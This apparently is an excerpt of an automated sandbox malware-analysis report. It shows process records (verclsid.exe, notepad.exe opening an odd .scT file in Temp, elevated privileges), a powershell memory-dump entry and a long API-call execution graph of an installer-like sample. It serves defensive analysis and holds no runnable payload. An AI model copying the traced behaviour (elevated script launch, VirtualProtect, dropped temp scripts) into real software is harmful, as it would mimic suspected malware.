                                                          Commandline:"C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                                                          Imagebase:0xff520000
                                                          File size:11776 bytes
                                                          MD5 hash:3796AE13F680D9239210513EDA590E86
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:23
                                                          Start time:05:35:38
                                                          Start date:18/03/2023
                                                          Path:C:\Windows\System32\notepad.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT
                                                          Imagebase:0xffa70000
                                                          File size:193536 bytes
                                                          MD5 hash:B32189BDFF6E577A92BAA61AD49264E6
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Disassembly

                                                          Reset < >

                                                            Executed Functions

                                                            Function 000007FF002807BA Relevance: .0, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.920995691.000007FF00280000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00280000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ff00280000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8186a9d334dd9cb0feefb8e737fcd35b43cc78e7094219c694a074c5487a30bf
                                                            • Instruction ID: 7124490244aa5ef4451e390dd16296ae8c3d111d94112d62d7462eb385d4d442
                                                            • Opcode Fuzzy Hash: 8186a9d334dd9cb0feefb8e737fcd35b43cc78e7094219c694a074c5487a30bf
                                                            • Instruction Fuzzy Hash: 30E0D811B29C0B0FFBD0666C684A7B573C0E754313F500076E80CC26E7DD29F9454381
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:21.6%
                                                            Dynamic/Decrypted Code Coverage:13.8%
                                                            Signature Coverage:16.1%
                                                            Total number of Nodes:1549
                                                            Total number of Limit Nodes:52
                                                            execution_graph 4931 73c210c6 4937 73c210f7 4931->4937 4932 73c212a7 GlobalFree 4933 73c211d5 GlobalAlloc 4933->4937 4934 73c21245 GlobalFree 4934->4937 4935 73c214e2 3 API calls 4935->4937 4936 73c212a3 4936->4932 4937->4932 4937->4933 4937->4934 4937->4935 4937->4936 4938 73c21286 GlobalFree 4937->4938 4939 73c2157e 2 API calls 4937->4939 4940 73c215c7 lstrcpyA 4937->4940 4942 73c2115d GlobalAlloc 4937->4942 4938->4937 4941 73c211ca GlobalFree 4939->4941 4943 73c211ad GlobalFree 4940->4943 4941->4937 4942->4937 4943->4937 4075 73c219c7 4076 73c219d7 VirtualProtect 4075->4076 4077 73c21a1e 4075->4077 4076->4077 4078 401ec5 4086 402c17 4078->4086 4080 401ecb 4081 402c17 17 API calls 4080->4081 4082 401ed7 4081->4082 4083 401ee3 ShowWindow 4082->4083 4084 401eee EnableWindow 4082->4084 4085 402ac5 4083->4085 4084->4085 4087 4062ea 17 API calls 4086->4087 4088 402c2c 4087->4088 4088->4080 4121 401746 4122 402c39 17 API calls 4121->4122 4123 40174d 4122->4123 4127 405e19 4123->4127 4125 401754 4126 405e19 2 API calls 4125->4126 4126->4125 4128 405e24 GetTickCount GetTempFileNameA 4127->4128 4129 405e51 4128->4129 4130 405e55 4128->4130 4129->4128 4129->4130 4130->4125 4944 401947 4945 402c39 17 API calls 4944->4945 4946 40194e lstrlenA 4945->4946 4947 402628 4946->4947 4951 401fcb 4952 402c39 17 API calls 4951->4952 4953 401fd2 4952->4953 4954 4065ce 2 API calls 4953->4954 4955 401fd8 4954->4955 4957 401fea 4955->4957 4958 4061b5 wsprintfA 4955->4958 4958->4957 4663 4014d6 4664 402c17 17 API calls 4663->4664 4665 4014dc Sleep 4664->4665 4667 402ac5 4665->4667 4738 401759 4739 402c39 17 API calls 4738->4739 4740 401760 4739->4740 4741 401786 4740->4741 4742 40177e 4740->4742 4778 406257 lstrcpynA 4741->4778 4777 406257 lstrcpynA 4742->4777 4745 401784 4749 406535 5 API calls 4745->4749 4746 401791 4747 405be9 3 API calls 4746->4747 4748 401797 lstrcatA 4747->4748 4748->4745 4759 4017a3 4749->4759 4750 4065ce 2 API calls 4750->4759 4751 405dc5 2 API calls 4751->4759 4753 4017ba CompareFileTime 4753->4759 4754 40187e 4755 405378 24 API calls 4754->4755 4758 401888 4755->4758 4756 405378 24 API calls 4763 40186a 4756->4763 4757 406257 lstrcpynA 4757->4759 4760 403143 31 API calls 4758->4760 4759->4750 4759->4751 4759->4753 4759->4754 4759->4757 4764 4062ea 17 API calls 4759->4764 4772 40596d MessageBoxIndirectA 4759->4772 4775 401855 4759->4775 4776 405dea GetFileAttributesA CreateFileA 4759->4776 4761 40189b 4760->4761 4762 4018af SetFileTime 4761->4762 4765 4018c1 CloseHandle 4761->4765 4762->4765 4764->4759 4765->4763 4766 4018d2 4765->4766 4767 4018d7 4766->4767 4768 4018ea 4766->4768 4770 4062ea 17 API calls 4767->4770 4769 4062ea 17 API calls 4768->4769 4771 4018f2 4769->4771 4773 4018df lstrcatA 4770->4773 4771->4763 4774 40596d MessageBoxIndirectA 4771->4774 4772->4759 4773->4771 4774->4763 4775->4756 4775->4763 4776->4759 4777->4745 4778->4746 4959 401659 4960 402c39 17 API calls 4959->4960 4961 40165f 4960->4961 4962 4065ce 2 API calls 4961->4962 4963 401665 4962->4963 4964 404cd9 GetDlgItem GetDlgItem 4965 404d2f 7 API calls 4964->4965 4976 404f56 4964->4976 4966 404dd7 DeleteObject 4965->4966 4967 404dcb SendMessageA 4965->4967 4968 404de2 4966->4968 4967->4966 4969 404e19 4968->4969 4971 4062ea 17 API calls 4968->4971 4972 4042d4 18 API calls 4969->4972 4970 405038 4973 4050e4 4970->4973 4983 405091 SendMessageA 4970->4983 5004 404f49 4970->5004 4977 404dfb SendMessageA SendMessageA 4971->4977 4978 404e2d 4972->4978 4974 4050f6 4973->4974 4975 4050ee SendMessageA 4973->4975 4985 405108 ImageList_Destroy 4974->4985 4986 40510f 4974->4986 5002 40511f 4974->5002 4975->4974 4976->4970 4999 404fc5 4976->4999 5018 404c27 SendMessageA 4976->5018 4977->4968 4982 4042d4 18 API calls 4978->4982 4979 40502a SendMessageA 4979->4970 4980 40433b 8 API calls 4984 4052e5 4980->4984 5001 404e3e 4982->5001 4987 4050a6 SendMessageA 4983->4987 4983->5004 4985->4986 4988 405118 GlobalFree 4986->4988 4986->5002 4990 4050b9 4987->4990 4988->5002 4989 404f18 GetWindowLongA SetWindowLongA 4992 404f31 4989->4992 5003 4050ca SendMessageA 4990->5003 4991 405299 4993 4052ab ShowWindow GetDlgItem ShowWindow 4991->4993 4991->5004 4994 404f36 ShowWindow 4992->4994 4995 404f4e 4992->4995 4993->5004 5016 404309 SendMessageA 4994->5016 5017 404309 SendMessageA 4995->5017 4996 404f13 4996->4989 4996->4992 4999->4970 4999->4979 5000 404e90 SendMessageA 5000->5001 5001->4989 5001->4996 5001->5000 5005 404ee2 SendMessageA 5001->5005 5006 404ece SendMessageA 5001->5006 5002->4991 5011 40515a 5002->5011 5023 404ca7 5002->5023 5003->4973 5004->4980 5005->5001 5006->5001 5008 405264 5009 40526f InvalidateRect 5008->5009 5012 40527b 5008->5012 5009->5012 5010 405188 SendMessageA 5014 40519e 5010->5014 5011->5010 5011->5014 5012->4991 5032 404be2 5012->5032 5013 405212 SendMessageA SendMessageA 5013->5014 5014->5008 5014->5013 5016->5004 5017->4976 5019 404c86 SendMessageA 5018->5019 5020 404c4a GetMessagePos ScreenToClient SendMessageA 5018->5020 5022 404c7e 5019->5022 5021 404c83 5020->5021 5020->5022 5021->5019 5022->4999 5035 406257 lstrcpynA 5023->5035 5025 404cba 5036 4061b5 wsprintfA 5025->5036 5027 404cc4 5028 40140b 2 API calls 5027->5028 5029 404ccd 5028->5029 5037 406257 lstrcpynA 5029->5037 5031 404cd4 5031->5011 5038 404b1d 5032->5038 5034 404bf7 5034->4991 5035->5025 5036->5027 5037->5031 5039 404b33 5038->5039 5040 4062ea 17 API calls 5039->5040 5041 404b97 5040->5041 5042 4062ea 17 API calls 5041->5042 5043 404ba2 5042->5043 5044 4062ea 17 API calls 5043->5044 5045 404bb8 lstrlenA wsprintfA SetDlgItemTextA 5044->5045 5045->5034 5046 401959 5047 402c17 17 API calls 5046->5047 5048 401960 5047->5048 5049 402c17 17 API calls 5048->5049 5050 40196d 5049->5050 5051 402c39 17 API calls 5050->5051 5052 401984 lstrlenA 5051->5052 5054 401994 5052->5054 5053 4019d4 5054->5053 5058 406257 lstrcpynA 5054->5058 5056 4019c4 5056->5053 5057 4019c9 lstrlenA 5056->5057 5057->5053 5058->5056 4779 403dda 4780 403df2 4779->4780 4781 403f53 4779->4781 4780->4781 4782 403dfe 4780->4782 4783 403fa4 4781->4783 4784 403f64 GetDlgItem GetDlgItem 4781->4784 4787 403e09 SetWindowPos 4782->4787 4788 403e1c 4782->4788 4786 403ffe 4783->4786 4796 401389 2 API calls 4783->4796 4785 4042d4 18 API calls 4784->4785 4789 403f8e SetClassLongA 4785->4789 4790 404320 SendMessageA 4786->4790 4797 403f4e 4786->4797 4787->4788 4791 403e25 ShowWindow 4788->4791 4792 403e67 4788->4792 4793 40140b 2 API calls 4789->4793 4819 404010 4790->4819 4798 403f40 4791->4798 4799 403e45 GetWindowLongA 4791->4799 4794 403e86 4792->4794 4795 403e6f DestroyWindow 4792->4795 4793->4783 4802 403e8b SetWindowLongA 4794->4802 4803 403e9c 4794->4803 4801 40425d 4795->4801 4804 403fd6 4796->4804 4805 40433b 8 API calls 4798->4805 4799->4798 4800 403e5e ShowWindow 4799->4800 4800->4792 4801->4797 4810 40428e ShowWindow 4801->4810 4802->4797 4803->4798 4807 403ea8 GetDlgItem 4803->4807 4804->4786 4808 403fda SendMessageA 4804->4808 4805->4797 4806 40425f DestroyWindow EndDialog 4806->4801 4811 403ed6 4807->4811 4812 403eb9 SendMessageA IsWindowEnabled 4807->4812 4808->4797 4809 40140b 2 API calls 4809->4819 4810->4797 4814 403ee3 4811->4814 4816 403f2a SendMessageA 4811->4816 4817 403ef6 4811->4817 4825 403edb 4811->4825 4812->4797 4812->4811 4813 4062ea 17 API calls 4813->4819 4814->4816 4814->4825 4815 4042ad SendMessageA 4818 403f11 4815->4818 4816->4798 4820 403f13 4817->4820 4821 403efe 4817->4821 4818->4798 4819->4797 4819->4806 4819->4809 4819->4813 4823 4042d4 18 API calls 4819->4823 4827 4042d4 18 API calls 4819->4827 4843 40419f DestroyWindow 4819->4843 4824 40140b 2 API calls 4820->4824 4822 40140b 2 API calls 4821->4822 4822->4825 4823->4819 4826 403f1a 4824->4826 4825->4815 4826->4798 4826->4825 4828 40408b GetDlgItem 4827->4828 4829 4040a0 4828->4829 4830 4040a8 ShowWindow KiUserCallbackDispatcher 4828->4830 4829->4830 4852 4042f6 KiUserCallbackDispatcher 4830->4852 4832 4040d2 EnableWindow 4837 4040e6 4832->4837 4833 4040eb GetSystemMenu EnableMenuItem SendMessageA 4834 40411b SendMessageA 4833->4834 4833->4837 4834->4837 4836 403dbb 18 API calls 4836->4837 4837->4833 4837->4836 4853 404309 SendMessageA 4837->4853 4854 406257 lstrcpynA 4837->4854 4839 40414a lstrlenA 4840 4062ea 17 API calls 4839->4840 4841 40415b SetWindowTextA 4840->4841 4842 401389 2 API calls 4841->4842 4842->4819 4843->4801 4844 4041b9 CreateDialogParamA 4843->4844 4844->4801 4845 4041ec 4844->4845 4846 4042d4 18 API calls 4845->4846 4847 4041f7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4846->4847 4848 401389 2 API calls 4847->4848 4849 40423d 4848->4849 4849->4797 4850 404245 ShowWindow 4849->4850 4851 404320 SendMessageA 4850->4851 4851->4801 4852->4832 4853->4837 4854->4839 5059 401a5e 5060 402c17 17 API calls 5059->5060 5061 401a67 5060->5061 5062 402c17 17 API calls 5061->5062 5063 401a0e 5062->5063 5064 401563 5065 402a42 5064->5065 5068 4061b5 wsprintfA 5065->5068 5067 402a47 5068->5067 5069 401b63 5070 402c39 17 API calls 5069->5070 5071 401b6a 5070->5071 5072 402c17 17 API calls 5071->5072 5073 401b73 wsprintfA 5072->5073 5074 402ac5 5073->5074 5075 401d65 5076 401d78 GetDlgItem 5075->5076 5077 401d6b 5075->5077 5079 401d72 5076->5079 5078 402c17 17 API calls 5077->5078 5078->5079 5080 401db9 GetClientRect LoadImageA SendMessageA 5079->5080 5082 402c39 17 API calls 5079->5082 5083 401e1a 5080->5083 5085 401e26 5080->5085 5082->5080 5084 401e1f DeleteObject 5083->5084 5083->5085 5084->5085 5086 404766 5087 404792 5086->5087 5088 4047a3 5086->5088 5147 405951 GetDlgItemTextA 5087->5147 5090 4047af GetDlgItem 5088->5090 5096 40480e 5088->5096 5093 4047c3 5090->5093 5091 4048f2 5145 404a9c 5091->5145 5149 405951 GetDlgItemTextA 5091->5149 5092 40479d 5094 406535 5 API calls 5092->5094 5095 4047d7 SetWindowTextA 5093->5095 5099 405c82 4 API calls 5093->5099 5094->5088 5100 4042d4 18 API calls 5095->5100 5096->5091 5101 4062ea 17 API calls 5096->5101 5096->5145 5098 40433b 8 API calls 5103 404ab0 5098->5103 5104 4047cd 5099->5104 5105 4047f3 5100->5105 5106 404882 SHBrowseForFolderA 5101->5106 5102 404922 5107 405cd7 18 API calls 5102->5107 5104->5095 5111 405be9 3 API calls 5104->5111 5108 4042d4 18 API calls 5105->5108 5106->5091 5109 40489a CoTaskMemFree 5106->5109 5110 404928 5107->5110 5112 404801 5108->5112 5113 405be9 3 API calls 5109->5113 5150 406257 lstrcpynA 5110->5150 5111->5095 5148 404309 SendMessageA 5112->5148 5115 4048a7 5113->5115 5118 4048de SetDlgItemTextA 5115->5118 5122 4062ea 17 API calls 5115->5122 5117 404807 5120 406663 5 API calls 5117->5120 5118->5091 5119 40493f 5121 406663 5 API calls 5119->5121 5120->5096 5128 404946 5121->5128 5124 4048c6 lstrcmpiA 5122->5124 5123 404982 5151 406257 lstrcpynA 5123->5151 5124->5118 5125 4048d7 lstrcatA 5124->5125 5125->5118 5127 404989 5129 405c82 4 API calls 5127->5129 5128->5123 5133 405c30 2 API calls 5128->5133 5134 4049da 5128->5134 5130 40498f GetDiskFreeSpaceA 5129->5130 5132 4049b3 MulDiv 5130->5132 5130->5134 5132->5134 5133->5128 5135 404be2 20 API calls 5134->5135 5144 404a4b 5134->5144 5138 404a38 5135->5138 5136 40140b 2 API calls 5137 404a6e 5136->5137 5152 4042f6 KiUserCallbackDispatcher 5137->5152 5140 404a4d SetDlgItemTextA 5138->5140 5141 404a3d 5138->5141 5140->5144 5143 404b1d 20 API calls 5141->5143 5142 404a8a 5142->5145 5153 4046bf 5142->5153 5143->5144 5144->5136 5144->5137 5145->5098 5147->5092 5148->5117 5149->5102 5150->5119 5151->5127 5152->5142 5154 4046d2 SendMessageA 5153->5154 5155 4046cd 5153->5155 5154->5145 5155->5154 5156 402766 5157 40276c 5156->5157 5158 402774 FindClose 5157->5158 5159 402ac5 5157->5159 5158->5159 5160 4023e8 5161 402c39 17 API calls 5160->5161 5162 4023f9 5161->5162 5163 402c39 17 API calls 5162->5163 5164 402402 5163->5164 5165 402c39 17 API calls 5164->5165 5166 40240c GetPrivateProfileStringA 5165->5166 5167 4027e8 5168 402c39 17 API calls 5167->5168 5169 4027f4 5168->5169 5170 40280a 5169->5170 5171 402c39 17 API calls 5169->5171 5172 405dc5 2 API calls 5170->5172 5171->5170 5173 402810 5172->5173 5195 405dea GetFileAttributesA CreateFileA 5173->5195 5175 40281d 5176 4028d9 5175->5176 5179 4028c1 5175->5179 5180 402838 GlobalAlloc 5175->5180 5177 4028e0 DeleteFileA 5176->5177 5178 4028f3 5176->5178 5177->5178 5182 403143 31 API calls 5179->5182 5180->5179 5181 402851 5180->5181 5196 40336b SetFilePointer 5181->5196 5184 4028ce CloseHandle 5182->5184 5184->5176 5185 402857 5186 403355 ReadFile 5185->5186 5187 402860 GlobalAlloc 5186->5187 5188 402870 5187->5188 5189 4028aa 5187->5189 5190 403143 31 API calls 5188->5190 5191 405e91 WriteFile 5189->5191 5194 40287d 5190->5194 5192 4028b6 GlobalFree 5191->5192 5192->5179 5193 4028a1 GlobalFree 5193->5189 5194->5193 5195->5175 5196->5185 5197 40166a 5198 402c39 17 API calls 5197->5198 5199 401671 5198->5199 5200 402c39 17 API calls 5199->5200 5201 40167a 5200->5201 5202 402c39 17 API calls 5201->5202 5203 401683 MoveFileA 5202->5203 5204 401696 5203->5204 5210 40168f 5203->5210 5206 4022ea 5204->5206 5207 4065ce 2 API calls 5204->5207 5205 401423 24 API calls 5205->5206 5208 4016a5 5207->5208 5208->5206 5209 406030 36 API calls 5208->5209 5209->5210 5210->5205 5211 4052ec 5212 405310 5211->5212 5213 4052fc 5211->5213 5215 405318 IsWindowVisible 5212->5215 5221 40532f 5212->5221 5214 405302 5213->5214 5223 405359 5213->5223 5216 404320 SendMessageA 5214->5216 5217 405325 5215->5217 5215->5223 5219 40530c 5216->5219 5220 404c27 5 API calls 5217->5220 5218 40535e CallWindowProcA 5218->5219 5220->5221 5221->5218 5222 404ca7 4 API calls 5221->5222 5222->5223 5223->5218 5224 73c22d6f 5225 73c22d87 5224->5225 5226 73c212d5 2 API calls 5225->5226 5227 73c22da2 5226->5227 5228 4019ed 5229 402c39 17 API calls 5228->5229 5230 4019f4 5229->5230 5231 402c39 17 API calls 5230->5231 5232 4019fd 5231->5232 5233 401a04 lstrcmpiA 5232->5233 5234 401a16 lstrcmpA 5232->5234 5235 401a0a 5233->5235 5234->5235 5236 40156f 5237 401586 5236->5237 5238 40157f ShowWindow 5236->5238 5239 401594 ShowWindow 5237->5239 5240 402ac5 5237->5240 5238->5237 5239->5240 4336 4022f3 4337 402c39 17 API calls 4336->4337 4338 4022f9 4337->4338 4339 402c39 17 API calls 4338->4339 4340 402302 4339->4340 4341 402c39 17 API calls 4340->4341 4342 40230b 4341->4342 4343 4065ce 2 API calls 4342->4343 4344 402314 4343->4344 4345 402325 lstrlenA lstrlenA 4344->4345 4346 402318 4344->4346 4348 405378 24 API calls 4345->4348 4347 405378 24 API calls 4346->4347 4350 402320 4346->4350 4347->4350 4349 402361 SHFileOperationA 4348->4349 4349->4346 4349->4350 5241 402173 5242 402c39 17 API calls 5241->5242 5243 40217a 5242->5243 5244 402c39 17 API calls 5243->5244 5245 402184 5244->5245 5246 402c39 17 API calls 5245->5246 5247 40218e 5246->5247 5248 402c39 17 API calls 5247->5248 5249 40219b 5248->5249 5250 402c39 17 API calls 5249->5250 5251 4021a5 5250->5251 5252 4021e7 CoCreateInstance 5251->5252 5253 402c39 17 API calls 5251->5253 5256 402206 5252->5256 5258 4022b4 5252->5258 5253->5252 5254 401423 24 API calls 5255 4022ea 5254->5255 5257 402294 MultiByteToWideChar 5256->5257 5256->5258 5257->5258 5258->5254 5258->5255 5259 4014f4 SetForegroundWindow 5260 402ac5 5259->5260 4653 402675 4654 402c17 17 API calls 4653->4654 4655 40267f 4654->4655 4656 405e62 ReadFile 4655->4656 4657 4026ef 4655->4657 4658 4026ff 4655->4658 4661 4026ed 4655->4661 4656->4655 4662 4061b5 wsprintfA 4657->4662 4660 402715 SetFilePointer 4658->4660 4658->4661 4660->4661 4662->4661 5261 402375 5262 40237c 5261->5262 5265 40238f 5261->5265 5263 4062ea 17 API calls 5262->5263 5264 402389 5263->5264 5264->5265 5266 40596d MessageBoxIndirectA 5264->5266 5266->5265 5267 4029f6 5268 402a49 5267->5268 5269 4029fd 5267->5269 5271 406663 5 API calls 5268->5271 5270 402a47 5269->5270 5272 402c17 17 API calls 5269->5272 5273 402a50 5271->5273 5275 402a0b 5272->5275 5274 402c39 17 API calls 5273->5274 5276 402a59 5274->5276 5277 402c17 17 API calls 5275->5277 5276->5270 5285 4062aa 5276->5285 5279 402a1a 5277->5279 5284 4061b5 wsprintfA 5279->5284 5281 402a67 5281->5270 5289 406294 5281->5289 5284->5270 5286 4062b5 5285->5286 5287 4062d8 IIDFromString 5286->5287 5288 4062d1 5286->5288 5287->5281 5288->5281 5292 406279 WideCharToMultiByte 5289->5292 5291 402a88 CoTaskMemFree 5291->5270 5292->5291 5293 401ef9 5294 402c39 17 API calls 5293->5294 5295 401eff 5294->5295 5296 402c39 17 API calls 5295->5296 5297 401f08 5296->5297 5298 402c39 17 API calls 5297->5298 5299 401f11 5298->5299 5300 402c39 17 API calls 5299->5300 5301 401f1a 5300->5301 5302 401423 24 API calls 5301->5302 5303 401f21 5302->5303 5310 405933 ShellExecuteExA 5303->5310 5305 401f5c 5306 4066d8 5 API calls 5305->5306 5307 4027c8 5305->5307 5308 401f76 CloseHandle 5306->5308 5308->5307 5310->5305 4855 401f7b 4856 402c39 17 API calls 4855->4856 4857 401f81 4856->4857 4858 405378 24 API calls 4857->4858 4859 401f8b 4858->4859 4860 4058f0 2 API calls 4859->4860 4861 401f91 4860->4861 4862 401fb2 CloseHandle 4861->4862 4864 4027c8 4861->4864 4870 4066d8 WaitForSingleObject 4861->4870 4862->4864 4866 401fa6 4867 401fb4 4866->4867 4868 401fab 4866->4868 4867->4862 4875 4061b5 wsprintfA 4868->4875 4871 4066f2 4870->4871 4872 406704 GetExitCodeProcess 4871->4872 4873 40669f 2 API calls 4871->4873 4872->4866 4874 4066f9 WaitForSingleObject 4873->4874 4874->4871 4875->4862 5311 401ffb 5312 402c39 17 API calls 5311->5312 5313 402002 5312->5313 5314 406663 5 API calls 5313->5314 5315 402011 5314->5315 5316 402029 GlobalAlloc 5315->5316 5319 402099 5315->5319 5317 40203d 5316->5317 5316->5319 5318 406663 5 API calls 5317->5318 5320 402044 5318->5320 5321 406663 5 API calls 5320->5321 5322 40204e 5321->5322 5322->5319 5326 4061b5 wsprintfA 5322->5326 5324 402089 5327 4061b5 wsprintfA 5324->5327 5326->5324 5327->5319 5328 4039fb 5329 403a06 5328->5329 5330 403a0a 5329->5330 5331 403a0d GlobalAlloc 5329->5331 5331->5330 5332 4018fd 5333 401934 5332->5333 5334 402c39 17 API calls 5333->5334 5335 401939 5334->5335 5336 405a19 67 API calls 5335->5336 5337 401942 5336->5337 4900 40247e 4901 402c39 17 API calls 4900->4901 4902 402490 4901->4902 4903 402c39 17 API calls 4902->4903 4904 40249a 4903->4904 4917 402cc9 4904->4917 4907 402ac5 4908 4024cf 4910 4024db 4908->4910 4912 402c17 17 API calls 4908->4912 4909 402c39 17 API calls 4911 4024c8 lstrlenA 4909->4911 4913 4024fd RegSetValueExA 4910->4913 4914 403143 31 API calls 4910->4914 4911->4908 4912->4910 4915 402513 RegCloseKey 4913->4915 4914->4913 4915->4907 4918 402ce4 4917->4918 4921 40610b 4918->4921 4922 40611a 4921->4922 4923 406125 RegCreateKeyExA 4922->4923 4924 4024aa 4922->4924 4923->4924 4924->4907 4924->4908 4924->4909 5338 401cfe 5339 402c17 17 API calls 5338->5339 5340 401d04 IsWindow 5339->5340 5341 401a0e 5340->5341 5342 401000 5343 401037 BeginPaint GetClientRect 5342->5343 5344 40100c DefWindowProcA 5342->5344 5346 4010f3 5343->5346 5347 401179 5344->5347 5348 401073 CreateBrushIndirect FillRect DeleteObject 5346->5348 5349 4010fc 5346->5349 5348->5346 5350 401102 CreateFontIndirectA 5349->5350 5351 401167 EndPaint 5349->5351 5350->5351 5352 401112 6 API calls 5350->5352 5351->5347 5352->5351 5353 401900 5354 402c39 17 API calls 5353->5354 5355 401907 5354->5355 5356 40596d MessageBoxIndirectA 5355->5356 5357 401910 5356->5357 5358 402780 5359 402786 5358->5359 5360 40278a FindNextFileA 5359->5360 5363 40279c 5359->5363 5361 4027db 5360->5361 5360->5363 5364 406257 lstrcpynA 5361->5364 5364->5363 5365 401502 5366 40150a 5365->5366 5368 40151d 5365->5368 5367 402c17 17 API calls 5366->5367 5367->5368 5369 73c21000 5372 73c2101b 5369->5372 5379 73c21504 5372->5379 5374 73c21020 5375 73c21032 5374->5375 5376 73c21024 GlobalAlloc 5374->5376 5377 73c21558 3 API calls 5375->5377 5376->5375 5378 73c21019 5377->5378 5381 73c2150a 5379->5381 5380 73c21510 5380->5374 5381->5380 5382 73c2151c GlobalFree 5381->5382 5382->5374 3856 73c21606 3857 73c21637 3856->3857 3898 73c22288 3857->3898 3859 73c2163e 3860 73c2176f 3859->3860 3861 73c21656 3859->3861 3862 73c2164f 3859->3862 3929 73c21f58 3861->3929 3945 73c21edd 3862->3945 3867 73c21680 3868 73c216a2 3867->3868 3869 73c216c0 3867->3869 3958 73c22128 3868->3958 3871 73c21711 3869->3871 3872 73c216c6 3869->3872 3870 73c2166b 3876 73c21682 3870->3876 3877 73c21675 3870->3877 3881 73c22128 11 API calls 3871->3881 3977 73c21e71 3872->3977 3873 73c2168a 3873->3867 3955 73c22e4f 3873->3955 3875 73c216a8 3969 73c215f4 3875->3969 3949 73c21774 3876->3949 3877->3867 3939 73c22bc4 3877->3939 3885 73c216fe 3881->3885 3890 73c2175e 3885->3890 3982 73c21f1f 3885->3982 3887 73c21688 3887->3867 3888 73c22128 11 API calls 3888->3885 3890->3860 3893 73c21768 GlobalFree 3890->3893 3893->3860 3895 73c2174f 3895->3890 3986 73c21558 wsprintfA 3895->3986 3896 73c21742 FreeLibrary 3896->3895 3989 73c212c6 GlobalAlloc 3898->3989 3900 73c222b4 3990 73c212c6 GlobalAlloc 3900->3990 3902 73c228f7 GlobalFree GlobalFree GlobalFree 3903 73c22917 3902->3903 3914 73c22965 3902->3914 3905 73c229b5 3903->3905 3912 73c22930 3903->3912 3903->3914 3904 73c222bf 3904->3902 3906 73c22814 GlobalAlloc 3904->3906 3908 73c22866 lstrcpyA 3904->3908 3909 73c22884 GlobalFree 3904->3909 3913 73c22871 lstrcpyA 3904->3913 3923 73c228c2 3904->3923 3924 73c22718 GlobalFree 3904->3924 3925 73c227b8 lstrcpyA 3904->3925 3991 73c212c6 GlobalAlloc 3904->3991 3992 73c212af 3904->3992 3907 73c229d6 GetModuleHandleA 3905->3907 3905->3914 3906->3904 3910 73c229e7 LoadLibraryA 3907->3910 3911 73c229fc 3907->3911 3908->3913 3909->3904 3910->3911 3910->3914 3997 73c21ece GetProcAddress 3911->3997 3912->3914 3919 73c212af 2 API calls 3912->3919 3913->3904 3914->3859 3916 73c22a09 3917 73c22a48 3916->3917 3928 73c22a32 GetProcAddress 3916->3928 3917->3914 3918 73c22a56 lstrlenA 3917->3918 3998 73c21ece GetProcAddress 3918->3998 3919->3914 3922 73c22a70 3922->3914 3923->3904 3995 73c212d5 GlobalSize GlobalAlloc 3923->3995 3924->3904 3925->3904 3928->3917 3936 73c21f6d 3929->3936 3931 73c220dc GlobalFree 3932 73c2165c 3931->3932 3931->3936 3932->3867 3932->3870 3932->3873 3933 73c22038 GlobalAlloc MultiByteToWideChar 3935 73c22067 GlobalAlloc CLSIDFromString GlobalFree 3933->3935 3938 73c22090 3933->3938 3934 73c212af lstrcpynA GlobalAlloc 3934->3936 3935->3931 3936->3931 3936->3933 3936->3934 3936->3938 4000 73c214e2 3936->4000 3938->3931 3938->3936 4005 73c21958 3938->4005 3941 73c22bd6 3939->3941 3940 73c22c7b CreateFileA 3944 73c22c99 3940->3944 3941->3940 4008 73c22b72 3944->4008 3946 73c21ef0 3945->3946 3947 73c21efb GlobalAlloc 3946->3947 3948 73c21655 3946->3948 3947->3946 3948->3861 3953 73c217a0 3949->3953 3950 73c21814 GlobalAlloc 3954 73c21832 3950->3954 3951 73c21825 3952 73c21829 GlobalSize 3951->3952 3951->3954 3952->3954 3953->3950 3953->3951 3954->3887 3957 73c22e5a 3955->3957 3956 73c22e9a GlobalFree 3957->3956 4011 73c212c6 GlobalAlloc 3958->4011 3960 73c221b0 StringFromGUID2 WideCharToMultiByte 3966 73c22136 3960->3966 3961 73c221d8 WideCharToMultiByte 3961->3966 3962 73c2219f lstrcpynA 3962->3966 3963 73c22202 wsprintfA 3963->3966 3964 73c22225 GlobalFree 3964->3966 3965 73c2225c GlobalFree 3965->3875 3966->3960 3966->3961 3966->3962 3966->3963 3966->3964 3966->3965 3967 73c2157e 2 API calls 3966->3967 4012 73c215c7 3966->4012 3967->3966 4016 73c212c6 GlobalAlloc 3969->4016 3971 73c215f9 3972 73c21e71 2 API calls 3971->3972 3973 73c21603 3972->3973 3974 73c2157e 3973->3974 3975 73c215c2 GlobalFree 3974->3975 3976 73c21587 GlobalAlloc lstrcpynA 3974->3976 3975->3885 3976->3975 3978 73c21e7e wsprintfA 3977->3978 3979 73c21eaf lstrcpyA 3977->3979 3981 73c216e5 3978->3981 3979->3981 3981->3888 3983 73c21724 3982->3983 3984 73c21f2e 3982->3984 3983->3895 3983->3896 3984->3983 3985 73c21f42 GlobalFree 3984->3985 3985->3984 3987 73c2157e 2 API calls 3986->3987 3988 73c21579 3987->3988 3988->3890 3989->3900 3990->3904 3991->3904 3999 73c212c6 GlobalAlloc 3992->3999 3994 73c212be lstrcpynA 3994->3904 3996 73c212f3 3995->3996 3996->3923 3997->3916 3998->3922 3999->3994 4001 73c212c6 GlobalAlloc 4000->4001 4002 73c214ef 4000->4002 4001->3936 4003 73c212af 2 API calls 4002->4003 4004 73c21502 4003->4004 4004->3936 4006 73c21967 VirtualAlloc 4005->4006 4007 73c219c5 4005->4007 4006->4007 4007->3938 4009 73c22b80 GetLastError 4008->4009 4010 73c22b8b 4008->4010 4009->4010 4010->3867 4011->3966 4013 73c215ce 4012->4013 4014 73c215ef 4012->4014 4013->4014 4015 73c215d7 lstrcpyA 4013->4015 4014->3966 